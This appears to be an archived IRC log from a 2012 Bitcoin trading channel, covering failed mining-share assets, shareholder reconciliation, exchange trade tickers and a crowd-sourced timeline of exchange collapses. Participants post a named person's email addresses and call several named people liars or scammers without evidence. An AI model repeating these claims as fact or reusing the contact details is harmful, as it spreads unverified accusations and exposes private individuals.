13:22:02 ahh Dec 08 13:22:29 I am delisting ABM on BitFunder Dec 08 13:22:40 MMM relisting Dec 08 13:22:42 wow, you already relisted it? Dec 08 13:22:56 this weekend Dec 08 13:22:57 Im going to have to relist DMC to shut it down Dec 08 13:31:27 Relisting or a buyback at reasonable price would be the best thing to do for asset issuers Dec 08 13:31:36 well Dec 08 13:31:41 Im relisting to get a reasonable price Dec 08 13:31:44 You dont want an angry Mob at your house, do you? Dec 08 13:31:53 nefario basically fucked up dmc's future Dec 08 13:32:06 it doesnt mean Im done Dec 08 13:32:11 he fucked up everyone Dec 08 13:32:13 but Im going to have to take a different route to get there Dec 08 13:32:32 and Im going to have to buy back all the dmc shares over the next few months before I can even start Dec 08 13:32:43 and since Im not an asshole, Im going to use my own money to do it Dec 08 13:34:17 Strange thing is.... not to be a dick, but usagi claimed he had 148 ABM shares but my list is almost 100% complete but no one got 148 shares or close..... hmmmmn Dec 08 13:34:35 PsychoticBoy: well Dec 08 13:34:43 did usagi even do a claim? Dec 08 13:34:51 I thought he was saying he was going to refuse to Dec 08 13:35:07 that means usagi lied, also to BMF share holders, who had 148 shares of ABM according to usagi Dec 08 13:35:22 heh. Dec 08 13:35:24 I dont think usagi even gives a fuck anymore Dec 08 13:35:32 BMF spreadsheet showd last time I can look, 148 shares ABM Dec 08 13:35:44 usagi IS a FUCK Dec 08 13:35:50 period Dec 08 13:36:03 lucky to get my coins back from him Dec 08 13:36:14 I wasnt stupid enough to give him coins, so hey Dec 08 13:36:22 your luck Dec 08 13:36:27 PsychoticBoy: wait, whats his email? Dec 08 13:36:30 he said he owned dmc too Dec 08 13:36:40 I have partial lists Dec 08 13:36:47 I got only 1 mail address of him Dec 08 13:37:14 I grepped for usagi, no usagi Dec 08 13:37:35 cpa@tsukino.ca, bmf@tsukino.ca, usagi@tsukino.ca Dec 08 13:38:18 grep tsukino DMC1.yml Dec 08 13:38:21 nadda. Dec 08 13:39:32 I can give DeadTerra a email to check if he has more email addresses of usagi/tsukino/ Oliver Richman etc Dec 08 13:39:58 not in the other one tiehr Dec 08 13:40:40 PsychoticBoy : https://bitcointalk.org/index.php?topic=129544.msg1386220#msg1386220 Dec 08 13:40:44 he's trolling about on the forum nao Dec 08 13:40:46 nope I read the whole list and no email seems to fit usagi Dec 08 13:47:01 I got 1 dubious email address Dec 08 13:47:32 but not seem to fit usagi Dec 08 13:47:53 its a .de emaildomaiin Dec 08 13:48:57 moar scamer tag Dec 08 13:50:59 usagi does NOT have any shares of ABM Dec 08 13:51:14 no email found, contacted all in the list Dec 08 13:51:39 so he did say to share holders of BMF that they owned 148 shares of ABM Dec 08 13:52:04 lets get a screeny of that , can probably find one on the forum Dec 08 13:52:52 he also sold the BFL singles BMF bought, did he? Dec 08 13:52:56 TO HIM SELF!! Dec 08 13:53:32 oooh to CPA or NYAN, but its both usagi so TO HIM SELF!! Dec 08 13:55:09 okay so PsychoticBoy Dec 08 13:55:17 my last count of dmc was 11909 Dec 08 13:55:35 the total of the lists is 11589 Dec 08 13:55:50 your only ~320 short Dec 08 13:55:53 so theres 320 shares unaccounted for Dec 08 13:56:04 no, exactly 320 Dec 08 13:56:25 so lets assume he had more than 320 DMC Dec 08 13:56:30 either he never held DMC Dec 08 13:56:34 or we dont know his email Dec 08 13:56:43 most shares are claimed, probably the only ones who where left out are the ones that recieved a double payment or did not claim Dec 08 13:56:54 [MPEX] [S.MPOE] 4319 @ 0.0005253 = 2.2688 BTC [+] Dec 08 13:57:28 I think da2ce7 is the largest shareholder lol Dec 08 14:02:47 what was Ukto's exchange called? Dec 08 14:04:43 PsychoticBoy: yo Dec 08 14:05:16 I think its bitfunder Dec 08 14:09:24 [MPEX] [S.MPOE] 6206 @ 0.00052051 = 3.2303 BTC [-] Dec 08 14:09:25 [MPEX] [S.MPOE] 34450 @ 0.00052032 = 17.925 BTC [-] Dec 08 14:09:27 [MPEX] [S.MPOE] 13044 @ 0.00051967 = 6.7786 BTC [-] Dec 08 14:11:57 [MPEX] [S.MPOE] 2 @ 0.0005253 = 0.0011 BTC [+] Dec 08 14:11:58 [MPEX] [S.MPOE] 14779 @ 0.00052536 = 7.7643 BTC [+] Dec 08 14:12:17 bitfunder, diablo Dec 08 14:13:01 yeah thats what I thought Dec 08 14:18:38 [MPEX] [S.MPOE] 4321 @ 0.0005251 = 2.269 BTC [-] Dec 08 14:18:39 [MPEX] [S.MPOE] 3229 @ 0.00052536 = 1.6964 BTC [+] Dec 08 14:23:13 [MPEX] [S.MPOE] 14423 @ 0.00052536 = 7.5773 BTC [+] Dec 08 14:42:16 [MPEX] [S.MPOE] 9200 @ 0.00052797 = 4.8573 BTC [+] Dec 08 14:42:17 [MPEX] [S.MPOE] 18171 @ 0.00052882 = 9.6092 BTC [+] Dec 08 14:44:59 [MPEX] [O.BTCUSD.C130T] 400 @ 0.20725089 = 82.9004 BTC [-] Dec 08 14:47:07 PsychoticBoy: MOST mining companies? Dec 08 14:47:14 please explain who Dec 08 14:47:20 bought back their shares Dec 08 14:47:30 Pureminingm Bitbond and Giavpa have not Dec 08 14:47:40 PIMP, has Dec 08 14:47:59 OK - 1 has Dec 08 14:48:00 Jah is going to do it Dec 08 14:48:20 I was planning but I am relisting at Bitfunder Dec 08 14:48:22 and as I said there will be no buyback at .07 Dec 08 14:49:00 and just reading your other question now Dec 08 14:49:19 when we payout - I am waiting to hear from hashking and Patrick on their status Dec 08 14:49:29 [MPEX] [S.DICE] 1882 @ 0.00336739 = 6.3374 BTC [+] Dec 08 14:49:39 hashking and patrick are broke Dec 08 14:49:49 so dont expect a dime from them Dec 08 14:49:52 as each of us had an amount of hashes to pay 2x weekly Dec 08 14:50:09 PsychoticBoy: I believe you are correct Dec 08 14:50:12 sure, maybe they did not even own that much hartdware Dec 08 14:50:28 hashking did for sure Dec 08 14:50:32 I only have 10Gh/s Dec 08 14:50:33 atm Dec 08 14:50:39 I had my portion covered about 2x Dec 08 14:51:22 In case they dont pay up, you cant afford 0.07 but if they do then its a reasonable price Dec 08 14:51:25 so I know we have ~38% of the coupons ready (my share) Dec 08 14:51:45 .07 is NOT a reasonable price Dec 08 14:51:52 onlyu the coupon? no buyback money? you are also broke then Dec 08 14:52:17 Not broke, no Dec 08 14:52:24 what do you propose then? Dec 08 14:52:43 Paying out some portion of the coupons cumulated Dec 08 14:52:52 I don;'t know when and how much Dec 08 14:53:00 due to the PH and HK issues Dec 08 14:53:13 all this is in the thread Dec 08 14:53:30 and, I have pay`d for lifetime (perpetual) 1 mh/s shares Dec 08 14:53:45 I have been accumluating my portion of the coupons Dec 08 14:53:47 so 100% coupon for life Dec 08 14:54:00 at 1mh/s a share Dec 08 14:54:04 well - 1 Mh/s will be worth a few satoshis in a year Dec 08 14:54:34 so taht I did not have to buy new hardware, now I have to compensate that hashes, no you have Dec 08 14:54:50 What good is 1.5 Gh/s going to do for you Dec 08 14:54:53 1 year is future talk Dec 08 14:55:00 https://bitcointalk.org/index.php?topic=129740.0 Dec 08 14:55:09 so apparently bakewell's thing got declared worthless. Dec 08 14:55:16 hell - it makes less than 1.4 BTC a week now Dec 08 14:55:17 1.5 Gh/s is a lot for some, lets say I am that some ppl Dec 08 14:55:22 so Dec 08 14:55:27 every btc is a btc Dec 08 14:55:34 I paid for it Dec 08 14:55:38 in advance Dec 08 14:55:54 Yes, as did I with other assets Dec 08 14:56:06 we are all getting screwed and elarning a lesson Dec 08 14:56:20 lesson? what lesson? Dec 08 14:56:40 We threw around BTC like it was play money Dec 08 14:56:57 there was not enough professionalism in the ventures being run Dec 08 14:57:08 there still isnt Dec 08 14:57:08 so, correct it then Dec 08 14:57:18 few people have the working capital to weather a shitstorm Dec 08 14:57:37 where's a cheshire cat when you need one. Dec 08 14:57:41 I am doing the best I can, at this point most issuers are just taking Dec 08 14:57:45 and those that didn't happened to be big players and have killed many others in the process Dec 08 14:59:09 PsychoticBoy: Maybe I try to consolidate the ownership of YABMC to 5-10 holders and then payout until ASIC arrives Dec 08 14:59:47 payout when asics arrive, that would be never Dec 08 15:00:16 PsychoticBoy: you seem to be missing the point that there will be a payout Dec 08 15:00:20 PsychoticBoy: Maybe I try to consolidate the ownership of YABMC to 5-10 holders and then payout until ASIC arrives << how's this work ? Dec 08 15:00:23 I have my portion of the BTC Dec 08 15:00:47 mircea_popescu: no idea - just throwing shit at the wall and seeing what sticks Dec 08 15:00:53 bad strategy. Dec 08 15:01:14 mircea_popescu: the benefit is a simpler payout Dec 08 15:01:20 if you want free advice, publish a clear piece delineating what you owe, what the other two owe, make a fixed date and a fixed payment. Dec 08 15:01:25 acocutning for share transfers = HUGE PITA Dec 08 15:01:28 like i did with giga.etf, essentially. Dec 08 15:01:41 sure, the regular idiots will make a lot of noise, but in principle it's the solution. Dec 08 15:02:04 mircea_popescu: I think that is where it is heading.... Dec 08 15:02:16 well, don't muck it up by first throwing things at the wal. Dec 08 15:02:22 I am trying to give PH and HK a chance to respond Dec 08 15:02:35 dude. if ph was gonna respond it was going to be before i started ruining his life. Dec 08 15:02:48 i wouldn't even bet he has what to respond with by now. Dec 08 15:03:21 I believe, as PsychoticBoy said, both are not in a position to pay anything Dec 08 15:03:33 hk i have no idea, but i guess not. Dec 08 15:03:36 HK's hread says he owes thousands of BTC Dec 08 15:03:48 that he'll repay 1/3 of in 3 years or some shit Dec 08 15:03:52 sorta like kludge. Dec 08 15:03:54 exactly Dec 08 15:04:09 another fuckwit empowered by the forum to act a part he wasn't cut for. Dec 08 15:04:50 The fucking Vegas meeting did many of us in Dec 08 15:04:53 funny thing, the same know it alls are all offended nao. but anyway, it's how it goes. Dec 08 15:05:18 that was P's hail mary to keep people from pulling BTC Dec 08 15:05:26 as many were starting to Dec 08 15:05:32 self included Dec 08 15:05:39 oh well - that is my mess Dec 08 15:07:11 ;;getrating genjix Dec 08 15:07:11 WARNING: Currently not authenticated. User genjix, rated since Sun Dec 19 21:40:18 2010. Cumulative rating -5, from 9 total ratings. Received ratings: 6 positive, 3 negative. Sent ratings: 5 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=genjix Dec 08 15:07:14 lol that's cute Dec 08 15:07:35 ;;getrating JWU42 Dec 08 15:07:35 WARNING: Currently not authenticated. User JWU42, rated since Thu Mar 24 19:21:43 2011. Cumulative rating 66, from 31 total ratings. Received ratings: 31 positive, 0 negative. Sent ratings: 29 positive, 1 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=JWU42 Dec 08 15:07:41 [MPEX] [S.MPOE] 4877 @ 0.00052605 = 2.5655 BTC [-] Dec 08 15:07:43 [MPEX] [S.MPOE] 11550 @ 0.00052382 = 6.0501 BTC [-] Dec 08 15:07:44 [MPEX] [S.MPOE] 7106 @ 0.00051967 = 3.6928 BTC [-] Dec 08 15:07:45 [MPEX] [S.MPOE] 2767 @ 0.00051962 = 1.4378 BTC [-] Dec 08 15:09:23 ;;rate davout 1 bitcoin-central.net paymium etc Dec 08 15:09:24 Rating entry successful. Your rating of 1 for user davout has been recorded. Dec 08 15:11:28 [MPEX] [S.MPOE] 4321 @ 0.00051973 = 2.2458 BTC [+] Dec 08 15:11:29 [MPEX] [S.MPOE] 783 @ 0.00051962 = 0.4069 BTC [-] Dec 08 15:11:31 [MPEX] [S.MPOE] 6146 @ 0.00051886 = 3.1889 BTC [-] Dec 08 15:13:08 seems like canceling asic orders era came Dec 08 15:13:54 [MPEX] [S.MPOE] 3059 @ 0.00052859 = 1.617 BTC [+] Dec 08 15:13:56 [MPEX] [S.MPOE] 5041 @ 0.00052882 = 2.6658 BTC [+] Dec 08 15:15:09 omg retard Dec 08 15:15:10 http://www.telegraph.co.uk/news/9722715/MI6-secrets-threatened-as-Swiss-spy-steals-a-mountain-of-data.html Dec 08 15:15:13 he should use bitcoin Dec 08 15:17:34 lol Dec 08 15:17:57 kakobreklaaa ya i guess the asic comps are the next thing to pop. Dec 08 15:18:40 "Swiss investigators raided his home and seized portable storage devices containing terrabytes of classified information, running into hundreds of thousands of printed pages." Dec 08 15:18:48 fucking bs, he stole their doodle pdfs Dec 08 15:28:48 hallo davout Dec 08 15:28:54 hi mircea! Dec 08 15:29:46 i'm in a playful mood, but i can't get a simple STAT working on MPEx Dec 08 15:31:28 i just answered your email. Dec 08 15:33:25 [MPEX] [O.BTCUSD.P140T] 445 @ 0.2247937 = 100.0332 BTC [+] Dec 08 15:36:58 [MPEX] [S.DICE] 50000 @ 0.0033995 = 169.975 BTC [+] Dec 08 15:36:59 I was only referring to this, https://www.google.ee/search?q=polimedia.us+spam Dec 08 15:37:41 Find Freelance polimedia us spam Jobs. Hire experienced Freelance polimedia us spam professionals on Freelancer.sg. Dec 08 15:37:43 ahaha that's good. Dec 08 15:57:06 [MPEX] [S.DICE] 3118 @ 0.00337418 = 10.5207 BTC [-] Dec 08 15:57:07 [MPEX] [S.DICE] 4333 @ 0.00333853 = 14.4659 BTC [-] Dec 08 15:57:18 Diablo-D3: did you get the updated list from James? Dec 08 15:57:26 yes Dec 08 15:57:34 it has two entries in it Dec 08 15:57:37 one of them is me. Dec 08 15:59:16 let me check my list, I think I had some of that DMC horror :) Dec 08 15:59:38 yep, I do have some DMC Dec 08 16:00:32 email? Dec 08 16:01:05 see PM Dec 08 16:01:40 ;;bc,stats Dec 08 16:01:41 Current Blocks: 211389 | Current Difficulty: 3438908.9601591 | Next Difficulty At Block: 211679 | Next Difficulty In: 290 blocks | Next Difficulty In About: 2 days, 3 hours, 4 minutes, and 20 seconds | Next Difficulty Estimate: 3408747.30061292 | Estimated Percent Change: -0.877070602787 Dec 08 16:01:56 EskimoBob: I see a pm. I dont see an email in the pm. Dec 08 16:02:31 [MPEX] [S.MPOE] 4321 @ 0.00051908 = 2.2429 BTC [-] Dec 08 16:02:31 [MPEX] [S.MPOE] 14704 @ 0.00051886 = 7.6293 BTC [-] Dec 08 16:02:33 [MPEX] [S.MPOE] 15475 @ 0.00051835 = 8.0215 BTC [-] Dec 08 16:22:03 and i thought it can't get any funnier https://bitcointalk.org/index.php?topic=129544.msg1386400#msg1386400 Dec 08 16:22:33 The first thing to know about this person is that she is psychotic. Or psychic. However you spell the word Dec 08 16:22:53 jurov i still didn't get wtf. Dec 08 16:23:35 i understood it like mpoe-pr = erin pavlina Dec 08 16:23:52 ;;google erin pavlina Dec 08 16:23:53 Erin Pavlina | Awaken, Remember, Love: ; Blog - Erin Pavlina: ; Readings | Erin Pavlina: Dec 08 16:24:14 erin is a psychic living in vegas Dec 08 16:24:31 they look alike at all to you ?! Dec 08 16:26:14 http://www.erinpavlina.com/images/erin-injured.jpg woman looks like she's at least 50 Dec 08 16:26:53 no. perhaps usagi is under psychic influence... hilarious Dec 08 16:27:52 im saving myself for when it's discovered she's marylin monroe Dec 08 16:33:24 http://www.oglaf.com/ orly, women want that? Dec 08 16:34:10 Forbidden (403) Dec 08 16:34:10 CSRF verification failed. Request aborted. Dec 08 16:34:12 dafuq Dec 08 16:34:36 oglaf is god. Dec 08 16:34:40 whatever she says goes. Dec 08 16:35:08 [MPEX] [S.MPOE] 4321 @ 0.00051839 = 2.24 BTC [+] Dec 08 16:35:09 [MPEX] [S.MPOE] 8825 @ 0.00051835 = 4.5744 BTC [-] Dec 08 16:35:11 [MPEX] [S.MPOE] 11504 @ 0.0005183 = 5.9625 BTC [-] Dec 08 16:44:01 [MPEX] [S.MPOE] 950 @ 0.00051972 = 0.4937 BTC [+] Dec 08 17:26:21 [MPEX] [S.MPOE] 3371 @ 0.00051972 = 1.752 BTC [+] Dec 08 17:26:22 [MPEX] [S.MPOE] 18056 @ 0.00052003 = 9.3897 BTC [+] Dec 08 17:26:23 [MPEX] [S.MPOE] 12201 @ 0.00052215 = 6.3708 BTC [+] Dec 08 17:29:30 [MPEX] [S.MPOE] 4321 @ 0.0005219 = 2.2551 BTC [-] Dec 08 17:29:31 [MPEX] [S.MPOE] 14829 @ 0.00052215 = 7.743 BTC [+] Dec 08 17:32:50 recieved your test satoshi`s JWU42 Dec 08 17:33:07 thks Dec 08 17:33:12 for confirmation Dec 08 17:33:56 0.00000524 btc and 0.00001067 btc Dec 08 17:34:22 rich man. Dec 08 17:34:36 whoehoe lets go out for dinner tonight Dec 08 17:34:48 hey - it is progress Dec 08 17:34:53 [MPEX] [S.MPOE] 4321 @ 0.00051897 = 2.2425 BTC [-] Dec 08 17:34:54 [MPEX] [S.MPOE] 7622 @ 0.00051873 = 3.9538 BTC [-] Dec 08 17:34:55 and nothing but a test for nwo Dec 08 17:34:55 [MPEX] [S.DICE] 35052 @ 0.00339949 = 119.1589 BTC [+] Dec 08 17:34:56 [MPEX] [S.DICE] 70448 @ 0.0033995 = 239.488 BTC [+] Dec 08 17:34:58 who is doing the dishes ;) Dec 08 17:44:12 [MPEX] [S.MPOE] 4321 @ 0.00052195 = 2.2553 BTC [+] Dec 08 17:44:13 [MPEX] [S.MPOE] 3370 @ 0.00052215 = 1.7596 BTC [+] Dec 08 17:44:15 [MPEX] [S.MPOE] 23709 @ 0.00052495 = 12.446 BTC [+] **** BEGIN LOGGING AT Sun Dec 9 01:13:34 2012 Dec 09 01:13:46 [MPEX] [S.MPOE] 4321 @ 0.00052662 = 2.2755 BTC [-] Dec 09 01:13:48 [MPEX] [S.MPOE] 1229 @ 0.00052644 = 0.647 BTC [-] Dec 09 01:23:55 [MPEX] [S.MPOE] 4321 @ 0.00052707 = 2.2775 BTC [+] Dec 09 01:23:57 [MPEX] [S.MPOE] 9029 @ 0.00052742 = 4.7621 BTC [+] Dec 09 01:31:33 [MPEX] [S.MPOE] 4595 @ 0.00052742 = 2.4235 BTC [+] Dec 09 01:31:34 [MPEX] [S.MPOE] 3724 @ 0.00052882 = 1.9693 BTC [+] Dec 09 01:31:36 [MPEX] [S.MPOE] 3531 @ 0.00052899 = 1.8679 BTC [+] Dec 09 01:49:41 [MPEX] [S.MPOE] 3092 @ 0.00052644 = 1.6278 BTC [-] Dec 09 01:49:42 [MPEX] [S.MPOE] 11241 @ 0.00052637 = 5.9169 BTC [-] Dec 09 01:51:21 "$8,000 for 8 months of WordPress hosting" Dec 09 01:52:58 [MPEX] [S.MPOE] 4321 @ 0.00052878 = 2.2849 BTC [+] Dec 09 01:52:59 [MPEX] [S.MPOE] 3979 @ 0.00052899 = 2.1049 BTC [+] Dec 09 01:53:04 http://codinginmysleep.com/the-bittalk-media-meltdown/ Dec 09 01:53:45 can't lose S3052 is on staff Dec 09 01:54:21 "Humorously, Invoice 10002 has a line item (bottom of the first page) for the time spent creating and paying invoice 10001. " Dec 09 01:54:27 S3052 is a glbse shareholder Dec 09 01:55:10 and so is Dec 09 01:56:35 0,0 Dec 09 01:56:53 n*a*e*d*m*r*e* Dec 09 01:57:30 >>replying to user bitarrow who contacted me by PM on the forum 0.08hrs 6.4pounds Dec 09 01:57:32 ftw! Dec 09 01:58:03 oh even better Dec 09 01:58:28 >>responded to mihai threads insults and accusations in staff channel on skype 0.67hrs 53 pounds Dec 09 01:58:33 threats* Dec 09 01:58:48 well he warned us all of the pirate ponzi, he deserves a little something for the effort Dec 09 01:59:29 $8000 ? Dec 09 01:59:31 lol Dec 09 01:59:54 Im just surprised he didnt charge "over $9000" Dec 09 02:00:22 8000 pounds is over 9000 usd Dec 09 02:00:33 lol so it is Dec 09 02:00:49 well they probably get the bitpay fee back as a bonus Dec 09 02:01:20 they can advertise the BFL scam on behalf of bitpay endlessly Dec 09 02:02:11 I dont always give 12 month interest fee loans but when I do its for equipoment that nevver arrives Dec 09 02:05:56 lol Dec 09 02:06:28 sooo there is bitcoin mag drama ? Dec 09 02:06:38 cool, should bridge us over till asics. Dec 09 02:07:14 Diablo-D3: what is a watchable "anime" from netflix? Dec 09 02:09:20 pigeons where did he warn us ? Dec 09 02:09:54 oh i thought vladimir was one of those guys very concerned about the pirate ponzi Dec 09 02:10:08 maybe i have him confised with some of the other nice russians Dec 09 02:10:25 i think you do Dec 09 02:10:44 you thinking of vandroyi's bet ? Dec 09 02:10:52 [MPEX] [S.DICE] 1300 @ 0.00335055 = 4.3557 BTC [+] Dec 09 02:10:55 probably Dec 09 02:11:15 the other few russians i know about were quite on board buying debt and all. Dec 09 02:13:13 "So what you are saying is, you kicked out the only person who is not a crazy person," Dec 09 02:13:17 dude i like greyhawk Dec 09 02:17:20 he repeatedly threatened the shareholders to block an investment that would have brought over $65,000 in new capital and probably would have saved the company. Dec 09 02:17:26 doesn't take so much to save these companies. Dec 09 02:17:37 pigeons: netflix/anime: none Dec 09 02:17:40 they are all dubbed Dec 09 02:19:31 If I see a bitcoin mag in the newsagents Im secretly going to wipe dogshit on the cover Dec 09 02:20:04 then send vlad an invoice for the dogshit Dec 09 02:20:07 does it have to be animes? Dec 09 02:20:16 The above statement contains multiply slanderous false statements of facts. Which is likely result of libel campaign perpetrated against myself Dec 09 02:20:19 ajhahaha! usagi LIVES! Dec 09 02:20:45 so what's the real story here ? anyone actually know ? Dec 09 02:20:51 Namjies: no anything. i'm housitting Dec 09 02:21:18 bitcoin companies are all retarded Dec 09 02:21:26 thats the real story Dec 09 02:21:31 There's Futurama assuming you haven't already seen it. Dec 09 02:21:58 i think i'll defy advice and go with bruno Dec 09 02:22:20 [MPEX] [S.MPOE] 2500 @ 0.00052672 = 1.3168 BTC [-] Dec 09 02:22:39 What is that? Dec 09 02:24:04 sasha baren cohn (borat) is a flaming hairdresser who baits people in alabama on camera Dec 09 02:24:47 so i started on a bitcoin drama timeline. Dec 09 02:24:56 is anyone willing to halp ? there's no way i can remember it all. Dec 09 02:25:13 I forget within an hour... Dec 09 02:25:25 good idea Dec 09 02:25:28 lets see here. mtgox hack. mybitcoin. Dec 09 02:25:34 then came what , before bitcoinica ? Dec 09 02:25:44 [MPEX] [S.MPOE] 1821 @ 0.00052672 = 0.9592 BTC [-] Dec 09 02:25:45 [MPEX] [S.MPOE] 12179 @ 0.00052637 = 6.4107 BTC [-] Dec 09 02:26:02 tradehill counts? Dec 09 02:26:07 yes Dec 09 02:26:08 surely. Dec 09 02:26:24 was the bitdaytrade before pirate ? Dec 09 02:26:36 it was at the same time Dec 09 02:26:39 it ended after iirc Dec 09 02:27:02 also http://ringcoin.com Dec 09 02:27:15 bitomat.pl Dec 09 02:27:19 theres like 100 missing in between Dec 09 02:27:20 ah Dec 09 02:27:26 please everyone dump his memories here Dec 09 02:27:34 i'll compile a collection, document it nicely. Dec 09 02:27:36 btcex.com Dec 09 02:27:42 just trying to make sure nothing is forgotten Dec 09 02:27:45 bitcoin7.com Dec 09 02:27:46 da fuck was btcex ?! Dec 09 02:27:50 wow. Dec 09 02:27:59 see, i didn't even have close to the complete list. Dec 09 02:28:18 along with BDT is bitcoinrebate, same guy Dec 09 02:28:23 there's MNW large bet, Patrick Harnett, Pirate, GLBSE, Tradehill, Hashking, Usagi, Diablo-D3, Theymos/Mods, and the list would go on. Dec 09 02:28:31 BTCex is a russian exchange took everyones money, came back, ignored it for like a year than did it again down for maintenence last 3 months Dec 09 02:28:34 Lots of drama around these Dec 09 02:28:59 bitomat was when their aws ami used ephemeral storage and they terminated the instance and lost their wallet Dec 09 02:29:05 hey i got one,... glbse Dec 09 02:29:13 yup glbse fo show Dec 09 02:29:16 sure. Dec 09 02:29:20 I already said that Dec 09 02:29:20 [MPEX] [S.MPOE] 4321 @ 0.00052885 = 2.2852 BTC [+] Dec 09 02:29:21 [MPEX] [S.MPOE] 16177 @ 0.00052899 = 8.5575 BTC [+] Dec 09 02:29:22 what about bitscalper Dec 09 02:29:23 for show as well. Dec 09 02:29:30 ah yes, bitscalper Dec 09 02:29:34 that polish thing, which mtgox aquired ? Dec 09 02:29:43 bitscalper uis also to bitdaytrade guy lol Dec 09 02:29:44 a yes bitomat.pl Dec 09 02:29:49 and the slush/bitcoinica vps hack Dec 09 02:30:02 linode hack? Dec 09 02:30:05 moonco.in with the fake ICE page Dec 09 02:30:13 yes :D Dec 09 02:30:22 allinvain Dec 09 02:30:43 world bitcoin exchange - the aussie scam Dec 09 02:30:49 peter lambert Dec 09 02:30:51 when did phantomcircuit mail the list of intersangro emails ? sometime q3-4 2011 Dec 09 02:30:54 haha Dec 09 02:30:57 Ubitex Dec 09 02:31:17 Shades Minoco Dec 09 02:31:31 I think all this drama requires a musical theme full of drama and madness. Dec 09 02:31:31 Wise Old Owl Dec 09 02:31:35 yes and bitlex stopped paying in his ponzi multiplier and just ignored the english forum for 2 years but stays on the german one Dec 09 02:32:05 what about ziggy and mybitcointrade or whatever it was Dec 09 02:32:19 i dunno but noone mentioned bfl, they are preety shit :) Dec 09 02:32:37 Anything ASIC related created some drama... Dec 09 02:32:38 definitely the next ponzi Dec 09 02:32:42 kakobreklaaa cause only doing past. Dec 09 02:32:44 Everything creates drama. Dec 09 02:33:00 future drama we do in a future installment. Dec 09 02:33:14 there was plenty of drama around bfl in the past Dec 09 02:33:16 shakaru Dec 09 02:33:20 womder when btcjam will blow Dec 09 02:33:38 *wonder Dec 09 02:34:01 also glasswalker mtgox 'hack' Dec 09 02:34:16 o, the bitfloor guy Dec 09 02:34:17 plato Dec 09 02:34:20 the first mt gox hack was pretty dramatic Dec 09 02:34:21 bitcoin conference Dec 09 02:34:28 I propose this theme for Bitcoin Drama: http://www.youtube.com/watch?v=OdWTJg6bf40 Dec 09 02:34:28 pigeons plato ?! Dec 09 02:34:30 what did he do !? Dec 09 02:34:30 what about Mybitcoin Dec 09 02:34:34 nothing Dec 09 02:34:37 eh ? Dec 09 02:34:41 Bruce Fagner Dec 09 02:35:06 what was mybitcoin loss in the end ? 200k ? 500k ? Dec 09 02:36:03 Astronomical. Dec 09 02:36:17 Estimated, of course. Dec 09 02:36:54 250k usd at may 2011 rates Dec 09 02:37:13 there was btc-e drama, but they fixed it Dec 09 02:37:16 seems 100k btc Dec 09 02:37:51 gpumax? Dec 09 02:38:31 ya ties into the pirate thing. Dec 09 02:39:02 https://bitcointalk.org/index.php?topic=83794.0 this is helpful Dec 09 02:39:13 also some poolse were scamming/hacke Dec 09 02:39:14 d Dec 09 02:45:29 [MPEX] [S.MPOE] 228 @ 0.00052899 = 0.1206 BTC [+] Dec 09 02:45:31 [MPEX] [S.MPOE] 27818 @ 0.00052945 = 14.7282 BTC [+] Dec 09 02:50:38 because they so totally don't look at all alike Dec 09 02:51:06 lmao Dec 09 02:51:15 well actually... we are both tall and dark haired. Dec 09 02:52:04 [MPEX] [S.MPOE] 18649 @ 0.00052945 = 9.8737 BTC [+] Dec 09 02:52:06 [MPEX] [S.MPOE] 1251 @ 0.00052952 = 0.6624 BTC [+] Dec 09 02:56:46 imho it would be easier to list oldest standing btc enterprises Dec 09 02:57:29 1. mtgox (though they use borderline scammy payout practices already) Dec 09 02:58:01 2. maybe few pools Dec 09 02:58:02 [MPEX] [S.MPOE] 16166 @ 0.00052952 = 8.5602 BTC [+] Dec 09 02:58:03 [MPEX] [S.MPOE] 10634 @ 0.00052967 = 5.6325 BTC [+] Dec 09 02:58:03 im curious what you have as 2 Dec 09 02:58:08 3. mpoe Dec 09 02:58:27 but yes, the pools should count for sure. Dec 09 02:59:24 [MPEX] [S.MPOE] 15600 @ 0.00052967 = 8.2629 BTC [+] Dec 09 03:01:56 no idea what else. britcoin/intersango? virwox? Dec 09 03:02:37 btc-e, vircurex Dec 09 03:04:59 vircurex ?! Dec 09 03:05:06 when did that happen ? Dec 09 03:06:01 He's just listing long standing BTC businesses. Dec 09 03:07:17 o sorry, got confused Dec 09 03:07:22 yes, just off my head. vircurex had found a spot in my heart for its uncontented ugliness Dec 09 03:07:30 but intersango certainly dun work. Dec 09 03:07:36 mpex never came close.. but then they fixed it Dec 09 03:07:44 [MPEX] [S.MPOE] 4321 @ 0.00052838 = 2.2831 BTC [-] Dec 09 03:07:44 [MPEX] [S.MPOE] 19200 @ 0.00052805 = 10.1386 BTC [-] Dec 09 03:07:46 [MPEX] [S.MPOE] 4129 @ 0.00052654 = 2.1741 BTC [-] Dec 09 03:08:08 intersango works afaik,just only in gbp Dec 09 03:08:42 last i know the guy was pretty much telling everyone to fuck off/ not taking new accounts etc Dec 09 03:09:23 they have shut down usd part or like that Dec 09 03:10:09 [MPEX] [S.MPOE] 4321 @ 0.00052961 = 2.2884 BTC [+] Dec 09 03:10:11 [MPEX] [S.MPOE] 4735 @ 0.00052967 = 2.508 BTC [+] Dec 09 03:10:12 [MPEX] [S.MPOE] 8244 @ 0.00052997 = 4.3691 BTC [+] Dec 09 03:12:00 ok enough of this bruno Dec 09 03:13:41 [MPEX] [S.DICE] 2000 @ 0.00335055 = 6.7011 BTC [+] Dec 09 03:13:49 wassup, sis? Dec 09 03:14:07 ABM launched onto bitfunder Dec 09 03:16:16 [MPEX] [S.MPOE] 206 @ 0.00052997 = 0.1092 BTC [+] Dec 09 03:16:16 [MPEX] [S.MPOE] 15414 @ 0.00053067 = 8.1797 BTC [+] Dec 09 03:16:16 [MPEX] [S.MPOE] 1580 @ 0.00053117 = 0.8392 BTC [+] Dec 09 03:16:41 Ukto, you have deleted testing acct? it says it doesn't know my email Dec 09 03:18:48 jurov: db was wiped at launch Dec 09 03:18:52 your accoutn may have been copeid to sandbox Dec 09 03:19:00 https://sandbox.bitfunder.com Dec 09 03:19:02 okay Dec 09 03:19:06 depending on when you signed up Dec 09 03:20:57 np, i was just interested in assets Dec 09 03:21:45 and the information is completely useless as to estimate the value Dec 09 03:21:53 one probably would have to dig in btctalk to know how much MH/s they have, how much do they pay for electricity, etc. Dec 09 03:23:02 Ukto, are they required to post monthly/quarterly report at least? Dec 09 03:24:01 with nice disclaimer in the bottom "This is a lie in our opinion." lmao Dec 09 03:24:15 https://bitfunder.com/terms Dec 09 03:25:38 lol Dec 09 03:25:58 actually, this is a step beyond burnside's "none of this exists and all is for educational purposes" 